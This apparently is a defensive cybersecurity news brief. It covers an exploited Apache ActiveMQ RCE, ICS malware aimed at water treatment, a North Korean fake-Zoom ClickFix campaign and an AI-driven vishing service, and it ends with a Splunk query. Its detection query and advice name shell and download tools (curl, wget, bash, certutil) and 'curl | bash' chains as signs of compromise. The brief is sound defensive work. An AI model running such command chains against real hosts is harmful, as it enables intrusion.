A 13-year-old remote code execution flaw in Apache ActiveMQ is now being exploited in the wild, two weeks after the patch dropped. CISA added CVE-2026-34197 to the KEV catalog yesterday. Separately, purpose-built ICS malware is hitting water infrastructure, a North Korean APT is social-engineering macOS users through fake Zoom updates, and an AI-powered vishing platform is automating credential theft at a scale that previously required rooms full of human callers.

In the News

Apache ActiveMQ CVE-2026-34197: 13 Years Dormant, Now Exploited

CVE-2026-34197 is a remote code execution vulnerability in Apache ActiveMQ Classic with a CVSS score of 8.8. The flaw resided in the OpenWire protocol implementation and existed in the codebase for approximately 13 years before Apache patched it in early April 2026 with ActiveMQ versions 5.18.7 and 6.1.5.

On April 16, CISA added CVE-2026-34197 to the Known Exploited Vulnerabilities (KEV) catalog after confirming active exploitation. The KEV listing triggers BOD 22-01 remediation timelines for federal civilian executive branch agencies, but its real significance is the signal it sends: exploitation is not theoretical. Attackers are using this now.

The operational challenge is visibility. ActiveMQ is middleware — it sits between applications, often behind the DMZ, frequently missed by external vulnerability scanners. Organizations that do not maintain accurate asset inventories of their message broker infrastructure will not know they are exposed until an attacker demonstrates it for them.

What defenders should do: Patch to ActiveMQ 5.18.7+ or 6.1.5+ immediately. If patching requires a maintenance window, restrict network access to the OpenWire transport connector (default TCP 61616) to only authorized application servers. Audit asset inventories for ActiveMQ instances — check container orchestration platforms, integration middleware stacks, and legacy application architectures where message brokers tend to persist untracked. Monitor for unexpected outbound connections from ActiveMQ hosts. MITRE ATT&CK: T1190 — Exploit Public-Facing Application.

Source: BleepingComputer

ZionSiphon Malware Purpose-Built for Water Treatment ICS/OT

Researchers disclosed ZionSiphon, a malware family purpose-built for sabotage operations against industrial control systems in Israeli water treatment facilities. The malware targets the operational technology environments that manage water purification and distribution — the systems that control chemical dosing, pressure, and flow rates.

Purpose-built ICS malware remains rare. Most ransomware campaigns that hit critical infrastructure do so incidentally — encrypting IT systems and causing OT disruption as a side effect. ZionSiphon is different. It is designed from the ground up to interact with industrial control processes, placing it in the same category as Industroyer, TRISIS/TRITON, and FrostyGoop — malware built specifically to manipulate physical processes.

The primary defensive gap in most water utilities is IT/OT segmentation. When operational technology networks share flat network space with corporate IT, any compromise of an email account, VPN credential, or web application becomes a potential path to the controllers managing water treatment. The second gap is visibility: many OT environments lack the network monitoring needed to detect anomalous commands on industrial protocols like Modbus, DNP3, or EtherNet/IP.

What defenders should do: Verify IT/OT network segmentation with actual traffic analysis, not architecture diagrams. Deploy OT-aware network monitoring that can baseline and alert on anomalous industrial protocol traffic. Review remote access paths into OT environments and ensure they require phishing-resistant MFA with session recording. MITRE ATT&CK for ICS: T0831 — Manipulation of Control, T0886 — Remote Services.

Source: SecurityWeek

Sapphire Sleet (DPRK) Targets macOS via Fake Zoom Updates

Microsoft published a detailed technical analysis of a Sapphire Sleet campaign deploying ClickFix social engineering against macOS users. Sapphire Sleet is a North Korean threat actor tracked by Microsoft, with established patterns of targeting cryptocurrency, finance, and technology sector organizations for credential and cryptocurrency theft.

The attack chain starts with social engineering — typically a LinkedIn or email lure offering a meeting or interview. When the target clicks the meeting link, they are presented with a fake Zoom update prompt that instructs them to copy and paste a command into Terminal. Because the user executes the command themselves, macOS Gatekeeper and notarization protections are bypassed entirely. The executed payload establishes persistence in the user’s LaunchAgent directory and begins credential harvesting and cryptocurrency wallet exfiltration.

This is a user-execution attack, not an exploit. No vulnerability is required. The defense stack that matters here is endpoint detection on macOS (which many organizations run with weaker coverage than Windows), application control policies that restrict Terminal execution of unsigned code, and security awareness training that specifically addresses macOS social engineering lures.

What defenders should do: Ensure endpoint detection and response agents are deployed on macOS with equivalent policy depth to Windows. Review LaunchAgent and LaunchDaemon directories for unauthorized persistence (~/Library/LaunchAgents/ and /Library/LaunchDaemons/). Block or alert on curl | bash and osascript execution chains from user-writable directories. Train users on the specific ClickFix lure pattern — no legitimate application update asks a user to paste commands into Terminal. MITRE ATT&CK: T1204.002 — User Execution: Malicious File, T1547.011 — Boot or Logon Autostart Execution: Plist Modification.

Source: Microsoft Security Blog

ATHR Vishing Platform Uses AI Voice Agents for Automated Credential Theft

A new vishing-as-a-service (VaaS) platform called ATHR deploys AI-generated voice agents to conduct phone-based social engineering at scale. The platform automates the full vishing call flow — pretexting as help desk staff, walking targets through credential disclosure or MFA approval, and extracting one-time codes — without requiring a human operator on the line.

The operational impact is volume. Traditional vishing campaigns were constrained by the number of skilled social engineers available. ATHR removes that bottleneck. An attacker can run hundreds of concurrent vishing calls, each delivered by a convincing AI voice agent that adapts its script based on the target’s responses.

This development forces a re-examination of help desk identity verification procedures. Many organizations still verify callers using knowledge-based authentication (employee ID, manager name, last four of SSN) — all of which can be harvested from prior breaches or OSINT. When the caller is an AI agent that never sounds nervous, never goes off-script, and never gives up, those controls are insufficient.

What defenders should do: Implement phishing-resistant MFA (FIDO2) to eliminate the value of stolen credentials and one-time codes. Upgrade help desk identity proofing beyond knowledge-based authentication — consider callback verification to a registered phone number or in-band identity verification through an enrolled authenticator app. Brief employees that AI-generated voices on phone calls are now operationally deployed by threat actors and that a caller sounding legitimate is no longer a reliable indicator of authenticity.

Source: BleepingComputer

Today’s Deep Dive — Middleware as Attack Surface: Why Message Brokers Keep Getting Exploited

The ActiveMQ KEV listing is not an isolated event. Apache ActiveMQ was the target of CVE-2023-46604 in late 2023 — another critical RCE in the OpenWire protocol — which was exploited by ransomware operators within days of disclosure. CVE-2026-34197 follows the same pattern: a flaw in the same protocol, in the same codebase, dormant for over a decade.

Message brokers like ActiveMQ, RabbitMQ, Apache Kafka, and IBM MQ sit at the center of application integration architectures. They handle inter-service communication, event streaming, and asynchronous processing. They are, by design, reachable by many internal systems. When a message broker is compromised, the attacker inherits the network position and trust relationships of every application that connects to it — which in enterprise environments can be dozens or hundreds of services.

The reason these systems keep appearing in exploitation timelines is a combination of three factors:

1. Invisible asset inventory. Message brokers are often deployed by development teams, sometimes in containers, sometimes on legacy VMs provisioned years ago. They rarely appear in the same asset management database as web servers and domain controllers. Vulnerability management programs that scan only known assets miss them entirely.

2. Excessive network exposure. The default configuration for most message brokers listens on all interfaces. In flat network architectures, this means any compromised host on the same subnet can reach the broker. ActiveMQ’s OpenWire connector defaults to TCP 61616 and its web console defaults to TCP 8161 — both frequently left accessible far beyond what is operationally necessary.

3. Infrequent patching cycles. Middleware is treated as infrastructure — “if it is not broken, do not touch it.” Patching a message broker requires coordination with every application that depends on it, which creates organizational friction that delays updates for weeks or months. Attackers who monitor CVE disclosures for middleware products understand this delay and target it.

The defensive response is straightforward in concept and difficult in execution: maintain an accurate, continuously updated inventory of all message broker instances; restrict network access to broker ports using host-based firewalls or microsegmentation to only the specific application servers that require connectivity; and include middleware in automated patch orchestration with SLAs that reflect the reality of active exploitation timelines — days, not months.

For ActiveMQ specifically, defenders should audit for instances still running OpenWire on the default port without authentication. The web management console at TCP 8161 should be disabled or restricted to management jump hosts. MITRE ATT&CK technique T1190 — Exploit Public-Facing Application applies when the broker is reachable from untrusted networks; T1210 — Exploitation of Remote Services applies for lateral movement within internal networks.

Detection Spotlight

The following Splunk SPL query identifies potential exploitation of ActiveMQ OpenWire protocol by detecting new or anomalous process execution spawned by the ActiveMQ Java process. This targets post-exploitation behavior where a successful RCE results in the ActiveMQ process spawning child processes it would not normally execute.

index=endpoint sourcetype=sysmon OR sourcetype=linux:auditd
  (ParentImage="*activemq*" OR ParentCommandLine="*activemq*" OR ParentImage="*java*" parent_command_line="*activemq*")
  NOT (Image IN ("*java*", "*jstack*", "*jmap*", "*jcmd*"))
| eval risk_score=case(
    match(Image, "(?i)(cmd\.exe|powershell|bash|sh|curl|wget|certutil|bitsadmin)"), 90,
    match(Image, "(?i)(python|perl|ruby|node)"), 75,
    true(), 50)
| where risk_score >= 75
| stats count earliest(_time) as first_seen latest(_time) as last_seen values(Image) as spawned_processes values(CommandLine) as commands by host ParentImage
| where count < 5
| sort - risk_score

This query monitors for the ActiveMQ Java process spawning shell interpreters (bash, sh, cmd.exe, powershell), download utilities (curl, wget, certutil), or scripting runtimes (python, perl) — none of which should be child processes of a message broker under normal operations. The count < 5 filter suppresses high-volume legitimate activity and focuses on novel executions. False positive rate is low in environments where ActiveMQ is not used for legitimate script execution; tune the NOT clause to exclude any site-specific maintenance scripts that legitimately run under the ActiveMQ process context.

References

Subscribe to the it-learn Brief

Get the daily cybersecurity brief in your inbox every weekday morning — news, SE angles, and detection queries.